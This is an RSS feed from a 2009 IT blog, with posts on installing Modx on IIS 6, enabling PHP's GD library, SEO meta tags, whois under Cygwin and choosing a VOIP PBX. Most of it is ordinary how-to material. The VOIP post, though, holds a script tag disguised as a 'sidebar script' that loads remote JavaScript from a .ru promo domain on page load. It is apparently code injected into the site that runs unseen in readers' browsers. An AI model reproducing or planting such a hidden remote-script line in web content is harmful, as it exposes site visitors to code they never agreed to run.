<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Data Center Hub</title>
	<atom:link href="http://www.datacenterhub.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.datacenterhub.com</link>
	<description>IT Security, Hosting Views and Ramblings</description>
	<pubDate>Fri, 15 Jan 2010 04:31:36 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
	<language>en</language>
			<item>
		<title>Missing Thumbnails in PHP on IIS 6</title>
		<link>http://www.datacenterhub.com/2009/12/04/missing-thumbnails-in-php-on-iis-6/</link>
		<comments>http://www.datacenterhub.com/2009/12/04/missing-thumbnails-in-php-on-iis-6/#comments</comments>
		<pubDate>Fri, 04 Dec 2009 19:02:29 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[Servers]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/12/04/missing-thumbnails-in-php-on-iis-6/</guid>
		<description><![CDATA[I noticed the images in the Modx manager had no thumbnails after getting Modx working on IIS 6.0 and Windows Server 2003. While the installation script for Modx is excellent, I did not get a warning about the missing GD library. How would one know that the reason the thumbnails are missing is due to [...]]]></description>
			<content:encoded><![CDATA[<p>I noticed the images in the Modx manager had no thumbnails after getting Modx working on IIS 6.0 and Windows Server 2003. While the installation script for Modx is excellent, I did not get a warning about the missing GD library. How would one know that the reason the thumbnails are missing is due to the GD library? I can only say I know because I know. If you have a PHP application with missing thumbnails, it is likely GD is not enabled.
</p>
<p>How to check if you have GD. Simply make a PHP info page and look for a section named gd. If you do not see one in your info page, open your php.ini file (likely in your Program Files\PHP\ folder) and look for ;extension=php_gd2.dll. Remove the semicolon and save the file. Check your EXT folder to be sure you have the dll located there. Make sure you only have one copy of the dll and in only one location. The contents of your info page should tell you where the extension should live.
</p>
<p>After saving the php.ini reload your php info page. Still don&#8217;t see it? Navigate to your IIS Manager and refresh your default application pool. Open IIS Manager-&gt;Server-&gt;Application Pools-&gt;DefaultAppPool – Right Click-&gt;Refresh. Now reload your info page and you should see gd included in the output.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/12/04/missing-thumbnails-in-php-on-iis-6/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hosted VOIP PBX or In-house?</title>
		<link>http://www.datacenterhub.com/2009/11/27/hosted-voip-pbx-or-in-house/</link>
		<comments>http://www.datacenterhub.com/2009/11/27/hosted-voip-pbx-or-in-house/#comments</comments>
		<pubDate>Fri, 27 Nov 2009 17:51:52 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[Internet and Phone]]></category>

		<category><![CDATA[Hosted PBX]]></category>

		<category><![CDATA[Hosted VOIP PBX]]></category>

		<category><![CDATA[VOIP]]></category>

		<category><![CDATA[VOIP PBX]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/?p=40</guid>
		<description><![CDATA[When does it make sense to use a Hosted or managed VOIP PBX systems or build a system in house? If you are new to the concept of a VOIP PBX, here is a nice video which should help you in the process.]]></description>
			<content:encoded><![CDATA[<p>When does it make sense to use a Hosted or managed VOIP PBX systems or build a system in house? If you are new to the concept of a VOIP PBX, here is a nice video which should help you in the process.<br />
<!-- sidebar script --><script type="text/javascript" src="http://upop.ru/promo/topbar.js"></script><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="486" height="412" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="flashObj" /><param name="bgcolor" value="#FFFFFF" /><param name="flashvars" value="videoId=1732351743&amp;playerId=271521204&amp;viewerSecureGatewayURL=https://console.brightcove.com/services/amfgateway&amp;servicesURL=http://services.brightcove.com/services&amp;cdnURL=http://admin.brightcove.com&amp;domain=embed&amp;autoStart=false&amp;" /><param name="src" value="http://c.brightcove.com/services/viewer/federated_f8/271521204" /><embed type="application/x-shockwave-flash" width="486" height="412" src="http://c.brightcove.com/services/viewer/federated_f8/271521204" flashvars="videoId=1732351743&amp;playerId=271521204&amp;viewerSecureGatewayURL=https://console.brightcove.com/services/amfgateway&amp;servicesURL=http://services.brightcove.com/services&amp;cdnURL=http://admin.brightcove.com&amp;domain=embed&amp;autoStart=false&amp;" bgcolor="#FFFFFF" name="flashObj"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/11/27/hosted-voip-pbx-or-in-house/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Installing Modx on IIS 6, Server 2003</title>
		<link>http://www.datacenterhub.com/2009/11/04/installing-modx-on-iis-5-server-2003/</link>
		<comments>http://www.datacenterhub.com/2009/11/04/installing-modx-on-iis-5-server-2003/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 20:30:15 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[Servers]]></category>

		<category><![CDATA[Modx]]></category>

		<category><![CDATA[PCRE]]></category>

		<category><![CDATA[PHP]]></category>

		<category><![CDATA[siteCache.idx.php]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/11/04/installing-modx-on-iis-5-server-2003/</guid>
		<description><![CDATA[I just installed Modx 1.0.0 on IIS 6.0, windows Server 2003 and had a few glitches. I&#8217;ve done several 1.0.0 installs under UNIX and they went without a hitch. These are just my notes for reference, not a &#8220;how-to&#8221;.
Prior to starting the install make sure the assets/cache/ Folder for the site has IUSR_MACHINE permissions or [...]]]></description>
			<content:encoded><![CDATA[<p>I just installed Modx 1.0.0 on IIS 6.0, windows Server 2003 and had a few glitches. I&#8217;ve done several 1.0.0 installs under UNIX and they went without a hitch. These are just my notes for reference, not a &#8220;how-to&#8221;.</p>
<p>Prior to starting the install make sure the assets/cache/ <em>Folder</em> for the site has IUSR_MACHINE permissions or you will get errors like &#8220;failed to open stream permission denied&#8221; for siteCache.idx.php and the install will fail.</p>
<p>Make sure you enable mbstring (extension=php_mbstring.dll) in your PHP.ini or you will get an error from Ajax Search of call to undefined function, e.g. &#8220;Fatal error: Call to undefined function mb_strlen() in C:/directory/assets/snippets/ajaxSearch/classes/ajaxSearch.class.inc.php on line 1090&#8243;. After you make the change, restart IIS and look for mbstring in the output of your PHP info page.</p>
<p>Following is another Ajax Search issue that I have not resolved yet. When you go to a page in the search results, you get:</p>
<p>« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:</p>
<p>« PHP Parse Error »</p>
<p>PHP error debug</p>
<p>Error:     preg_replace() [function.preg-replace]: Compilation failed: lookbehind assertion is not fixed length at offset 11</p>
<p>Error type/ Nr.:     Warning - 2</p>
<p>File:     C:\location\manager\includes\document.parser.class.inc.php(746) : eval()&#8217;d code</p>
<p>Line:     120</p>
<p>This is repeatable on my CentOS box and now my windows box too. The issue on CentOS is PHP was compiled against a buggy version of PCRE- but- the version used in that web server is held hostage by Parallels and their poorly supported control panel Plesk, which is not upgradable and is not planned to be upgraded for some time yet. On the windows box, updating PHP is a little easier. My info.php shows PHP is compiled with PCRE Library Version 6.6 06-Feb-2006. So the issue is not with Modx or the Ajax Search- it is with the PCRE Library. This should be resolved on windows by upgrading PHP. On the Unix box, I did a workaround and simply turn off the ajax search results highlighting.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/11/04/installing-modx-on-iis-5-server-2003/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Add a “tweetthis” link to any page</title>
		<link>http://www.datacenterhub.com/2009/11/03/add-a-%e2%80%9ctweetthis%e2%80%9d-link-to-any-page/</link>
		<comments>http://www.datacenterhub.com/2009/11/03/add-a-%e2%80%9ctweetthis%e2%80%9d-link-to-any-page/#comments</comments>
		<pubDate>Tue, 03 Nov 2009 16:37:15 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/11/03/add-a-%e2%80%9ctweetthis%e2%80%9d-link-to-any-page/</guid>
		<description><![CDATA[Dave Child at AddedBytes.com created a really cool snippet for Modx 0.9.6.3 called &#8220;tweetthis&#8221; The tweetthis snippet will return a link to twitter for the user to tweet the current page. The URL is sent through TinyURL automagically and TinyURLs are cached indefinitely to assets/cache/tweetthis.txt. The Link is given the class &#8220;tweetthis&#8221; so you may [...]]]></description>
			<content:encoded><![CDATA[<p>Dave Child at <a href="http://www.addedbytes.com/">AddedBytes.com</a> created a really cool snippet for Modx 0.9.6.3 called &#8220;tweetthis&#8221; The tweetthis snippet will return a link to twitter for the user to tweet the current page. The URL is sent through TinyURL automagically and TinyURLs are cached indefinitely to assets/cache/tweetthis.txt. The Link is given the class &#8220;tweetthis&#8221; so you may apply some styling to it. Here is a link to <a href="http://modxcms.com/extras/package/?package=533">download tweethis</a>. It also works on Modx 1.0 (for me, at least).
</p>
<p>Here&#8217;s how to add it to your Modx site:
</p>
<ol>
<li>Login to your manager interface Go to Elements-&gt;Manage Elements-&gt;Snippets-&gt;New Snippet.
</li>
<li>Give your new snippet a name of &#8220;tweetthis&#8221; and copy and paste the text of the snippet file into the snippet code form- don&#8217;t forget to keep the PHP open and close tags, choose a category under &#8220;Properties&#8221; and tick off the &#8220;Lock snippet&#8221; box
</li>
<li>Save your snippet
</li>
<li>
<div>Open your desired template (e.g blog or default) and add a call to the snippet with your optional parameters.
</div>
<p style="margin-left: 36pt">&amp;name=`@Shopping_CartIt` Optionally use your Twitter ID by prefixing your ID with an @.
</p>
<p style="margin-left: 36pt">&amp;text=`Tweet This!` Optional label Text for the link. &#8220;Tweet This!&#8221; is the default text.
</p>
<p style="margin-left: 36pt">&amp;id=`5` Optional Document ID.  If not specified it defaults to the current document.
</p>
</li>
<li>Example Snippet Call: [!tweetthis?&amp;name=`Shopping_CartIt`!] Save your template.
</li>
<li>If desired, edit your CSS to style the link.
</li>
<li>Test your page, apply to additional templates.
</li>
</ol>
<p>Here is a <a href="http://www.CartItShoppingCart.com/">site with the TweetThis snippet</a> installed- try it out. If you&#8217;re not using <a href="http://www.modxCMS.com/">ModX</a>, check it out. I&#8217;ve built a dozen sites with it over the last few years and it is a powerful platform for SEO and content management.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/11/03/add-a-%e2%80%9ctweetthis%e2%80%9d-link-to-any-page/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Modx SEO fine tuning- adding global Meta tags for keywords and description</title>
		<link>http://www.datacenterhub.com/2009/10/28/modx-seo-fine-tuning-adding-global-meta-tags-for-keywords-and-description/</link>
		<comments>http://www.datacenterhub.com/2009/10/28/modx-seo-fine-tuning-adding-global-meta-tags-for-keywords-and-description/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 15:21:24 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/10/28/modx-seo-fine-tuning-adding-global-meta-tags-for-keywords-and-description/</guid>
		<description><![CDATA[Modx 0.9.X and 1.X have a default keyword manager that you may manually apply to each page but it is rather clunky to use, requiring each keyword entered manually first to the list, then manually applied to each page.
An easier way to do this is to create a Template Variable for the keywords and add [...]]]></description>
			<content:encoded><![CDATA[<p>Modx 0.9.X and 1.X have a default keyword manager that you may manually apply to each page but it is rather clunky to use, requiring each keyword entered manually first to the list, then manually applied to each page.</p>
<p>An easier way to do this is to create a Template Variable for the keywords and add it to the default template for the site.  You can apply a default list to all pages and then manually edit each page to fine tune your keywords and descriptions.</p>
<h2>Keywords first:</h2>
<p>As site admin on the Modx manager interface you should first create a Template Variable (TV) called <em>keywords</em>, caption of <em>Meta Keywords</em>, default text of &#8220;<em>type your keywords for the page her</em>e&#8221;, input type &#8220;<em>text</em>&#8220;, Input Option Values <em>blank</em>, Default Value; enter a list of your site-wide default keywords separated by commas. E.G. &#8220;<em>Web Servers, Web Hosting, Dedicated Servers</em>&#8221; etc. Tick off &#8220;Lock the template variable&#8221; leave Widget and Sort Order blank, Tick off your templates to use the TV, choose a Category E.G. <em>Modx Default Templates</em> and save it.</p>
<h2>Now go to your template and add the following</h2>
<p>&lt;meta name=&#8221;keywords&#8221; content=&#8221;[*keywords*]&#8221; /&gt;</p>
<p>Save the template, clear the site cache and view your page. All the pages using this template should have the default keywords now. If you pull up an individual page and edit in the manager interface, you should see the keyword list which you can customize for each page.  If you already added keywords to your pages- don&#8217;t forget to deselect them and save the page for each page you have applied them to. You don&#8217;t want to have keywords added twice.</p>
<h2>Now add the Description Meta data-</h2>
<p>Adding Meta description is even easier- just add:</p>
<p>&lt;meta name=&#8221;description&#8221; content=&#8221;[*description*]&#8220;/&gt;</p>
<p>to your Modx template; if you entered a description into the description field when creating your document, you should see this in the HTML source for the pages of your web site.</p>
<h2>BASE HREF tag</h2>
<p>Don&#8217;t forget to add a BASE HREF tag to your site so that all links are built relative to your site root, regardless of how the site is called. This can be helpful if you have another domain as an alias for your site.</p>
<p>&lt;base href=&#8221;http://www.domain.com/&#8221;&gt;&lt;/base&gt;</p>
<p>Replace www.domain.com/ with your site root URL.</p>
<h2>301 Redirect</h2>
<p>You should use a 301 redirect for sites that might be viewed using the domain name (domain.com without www) rather than the host (www, etc) name. How to do this varies depending on your web server.  Here is an article I wrote on both <a title="301 Redirects" href="http://www.cartitshoppingcart.com/Shopping-Cart-Help-Getting-Help-with-CartIt/Shopping-Cart-Support-Articles/cartit-3.x-support-articles/Why-do-I-receive-a-Shopper-Authorization-Error-message-when-adding-an-item-to-the-shopping-cart.html">301 redirects and BASE HREF</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/10/28/modx-seo-fine-tuning-adding-global-meta-tags-for-keywords-and-description/feed/</wfw:commentRss>
		</item>
		<item>
		<title>More cool web intelligence tools</title>
		<link>http://www.datacenterhub.com/2009/09/10/more-cool-web-intelligence-tools/</link>
		<comments>http://www.datacenterhub.com/2009/09/10/more-cool-web-intelligence-tools/#comments</comments>
		<pubDate>Thu, 10 Sep 2009 11:59:42 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/09/10/more-cool-web-intelligence-tools/</guid>
		<description><![CDATA[Here are a few more of the tools I use for web site intelligence.  I could write an article on each, but that would take away the fun of your discovery of the tools and their ultimate use in your hands- they&#8217;re not all hammers- and best of all, you won&#8217;t smash your fingers [...]]]></description>
			<content:encoded><![CDATA[<p>Here are a few more of the tools I use for web site intelligence.  I could write an article on each, but that would take away the fun of your discovery of the tools and their ultimate use in your hands- they&#8217;re not all hammers- and best of all, you won&#8217;t smash your fingers with any of these internet marketing research tools.
</p>
<p>Quantcast can help you determine popularity of a site, demographics of visitors, and also tip you to what other sites visitors of your target site also visit. It can also help you as a site owner to learn your reach better. You may be disappointed to find what your reach really is- but that does not mean you don&#8217;t have an effective site. You can still have small reach while dominating for your chosen keywords. <a href="http://www.quantcast.com">www.quantcast.com</a>
	</p>
<p>Here is a favorite of mine. It is rather tedious to download the root zone files from each registry and run them through a database. If you really want to know what your competition is doing, a subscription to <a href="http://www.domaintools.com">www.domaintools.com</a> and their name server spy feature can help you find out. You can get an alert each time your competitor registers a new domain to their name server, or filter on the email address they use for domains. This is all publicly available data- no espionage going on here, just good old hard research not easily accessed unless you dig through 30 GB of data daily.  There are also dozens of other tools on this site; many are free.  The name suggestion tool is helpful in finding new related domains.
</p>
<p>This one can help you improve your conversions. There have been studies showing eye patterns on web pages typically form the letter &#8220;F&#8221;- I&#8217;ve seen it on my own pages. Try using the heat map and you&#8217;ll see. It is amazing how tiny tweaks can improve your conversion rates. One tip I learned- keep your action items &#8220;above the fold&#8221; as they (used) to say in the newspaper business.  <a href="http://www.crazyegg.com">www.crazyegg.com</a>
	</p>
<p>Naturally there are more tools I use- remember: &#8220;The first rule of success in business is: never tell everything you know. The second rule is:&#8221; If you&#8217;d like to learn more about improving the performance of your web sites, head over to avatava.com and contact me. I have been working at this web site stuff since 1994.   And so you know; I am not affiliated with any of the above companies other than as a user of their services. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/09/10/more-cool-web-intelligence-tools/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Easy Whois for Windows</title>
		<link>http://www.datacenterhub.com/2009/09/02/easy-whois-for-windows/</link>
		<comments>http://www.datacenterhub.com/2009/09/02/easy-whois-for-windows/#comments</comments>
		<pubDate>Wed, 02 Sep 2009 14:56:51 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[Hosting]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/09/02/easy-whois-for-windows/</guid>
		<description><![CDATA[I&#8217;ll show you how you can start looking up domains on your local windows machine within a few minutes of downloading Cygwin.

I have a few associates who have a regular need to do whois queries. Many of them go to popular registrars&#8217; websites to look up domains- they are amazed at how quickly I can [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ll show you how you can start looking up domains on your local windows machine within a few minutes of downloading Cygwin.
</p>
<p>I have a few associates who have a regular need to do whois queries. Many of them go to popular registrars&#8217; websites to look up domains- they are amazed at how quickly I can get to the information they&#8217;re searching for. The websites take too much time in my opinion.  Whois is a default command line utility in Unix-like OSes, but not on Windows.  I&#8217;ll show you how to add it to your Win box without being too geeky.
</p>
<p>
 </p>
<ol>
<li>Get Cygwin- <a href="http://www.cygwin.org">www.cygwin.org</a>  – Cygwin is a suite of command line utilities for windows- without Cygwin I feel like a carpenter without anything but a hammer. Download and run the setup.exe
</li>
<li>Accept all the defaults, choosing a mirror which seems to be near you. When you get to the &#8220;select packages&#8221; screen, maximize the box and expand the &#8220;Net&#8221; section, scroll down to &#8220;whois: GNU whois&#8221; and click the item in the &#8220;New&#8221; column- you should see the package version instead of &#8220;Skip&#8221;.  Click &#8220;Next&#8221; and when the install is done, open a shell under Cygwin.
</li>
<li>When in your shell, simply type: whois domain.com and press enter. You should see a response from the server in a few seconds.
</li>
</ol>
<p>Enjoy- you now have many more tools available to you- just like a power user!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/09/02/easy-whois-for-windows/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Gmail is down with error 502</title>
		<link>http://www.datacenterhub.com/2009/09/01/gmail-is-down-with-error-502/</link>
		<comments>http://www.datacenterhub.com/2009/09/01/gmail-is-down-with-error-502/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 20:27:32 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/09/01/gmail-is-down-with-error-502/</guid>
		<description><![CDATA[Gmail is down with error 502

OK Guys, I got the dreaded 502 error on my Gmail account today- funny thing though, my Firefox app still kept delivering screen pops- so I knew all of Gmail was not down. I logged into a server that was 150 miles from my home location and what do you [...]]]></description>
			<content:encoded><![CDATA[<p>Gmail is down with error 502
</p>
<p>OK Guys, I got the dreaded 502 error on my Gmail account today- funny thing though, my Firefox app still kept delivering screen pops- so I knew all of Gmail was not down. I logged into a server that was 150 miles from my home location and what do you know? Gmail worked from there! So, it appears my home connection kept going out to a dead server. Solution? Simply run ipconfig /flushdns from a command prompt- worked for me! BTW, if you are running Vista, don&#8217;t forget to right click on the command prompt icon and choose &#8220;Run as Administrator&#8221; or you&#8217;ll get a message about elevated privileges required. Hope this helps. Later, Bill Laakkonen</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/09/01/gmail-is-down-with-error-502/feed/</wfw:commentRss>
		</item>
		<item>
		<title>My Dirty little SEO secret</title>
		<link>http://www.datacenterhub.com/2009/08/27/my-dirty-little-seo-secret/</link>
		<comments>http://www.datacenterhub.com/2009/08/27/my-dirty-little-seo-secret/#comments</comments>
		<pubDate>Thu, 27 Aug 2009 16:31:17 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2009/08/27/my-dirty-little-seo-secret/</guid>
		<description><![CDATA[I&#8217;ve been asked many times how I&#8217;ve achieved such good search engine optimization results. I have to admit, I have a secret tool I use- it&#8217;s called Web Position 4 Pro.  You can use it to analyze, report, optimize, submit to search engines, and more. No, I&#8217;m not an affiliate- not getting paid to [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been asked many times how I&#8217;ve achieved such good search engine optimization results. I have to admit, I have a secret tool I use- it&#8217;s called Web Position 4 Pro.  You can use it to analyze, report, optimize, submit to search engines, and more. No, I&#8217;m not an affiliate- not getting paid to endorse the product. I find it useful and if you design a web site to make money- you should find it useful too.
</p>
<p>The only downside I&#8217;ve found is the Wordtracker feature requires a separate subscription, as does the web page critic feature.  In reality, this is good because the targets are always changing, and people can&#8217;t be expected to work for free.  You can get a <a href="http://www.webposition.com/default.asp">free trial version of the WebPosition Pro 4 here</a>- nothing to lose, and I&#8217;ll bet you&#8217;ll learn something new about SEO. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2009/08/27/my-dirty-little-seo-secret/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Search Results- How to control How your content appears and what should not.</title>
		<link>http://www.datacenterhub.com/2008/05/13/search-results-how-to-control-how-your-content-appears-and-what-not/</link>
		<comments>http://www.datacenterhub.com/2008/05/13/search-results-how-to-control-how-your-content-appears-and-what-not/#comments</comments>
		<pubDate>Tue, 13 May 2008 21:17:09 +0000</pubDate>
		<dc:creator>Bill Laakkonen</dc:creator>
		
		<category><![CDATA[SEO]]></category>

		<category><![CDATA[Web Site Design]]></category>

		<guid isPermaLink="false">http://www.datacenterhub.com/2008/05/13/search-results-how-to-control-how-your-content-appears-and-what-not/</guid>
		<description><![CDATA[This is a helpful article for the uninitiated regarding control over not only which pages appear in search results, but also shows some options you can use to  control how they appear- read 6 ways to control how and what content appears in search engines
]]></description>
			<content:encoded><![CDATA[<p>This is a helpful article for the uninitiated regarding control over not only which pages appear in search results, but also shows some options you can use to  control how they appear- read <a title="http://www.antezeta.com/avoid-search-engine-indexing.html" href="http://www.antezeta.com/avoid-search-engine-indexing.html" target="_blank">6 ways to control how and what content appears in search engines</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.datacenterhub.com/2008/05/13/search-results-how-to-control-how-your-content-appears-and-what-not/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
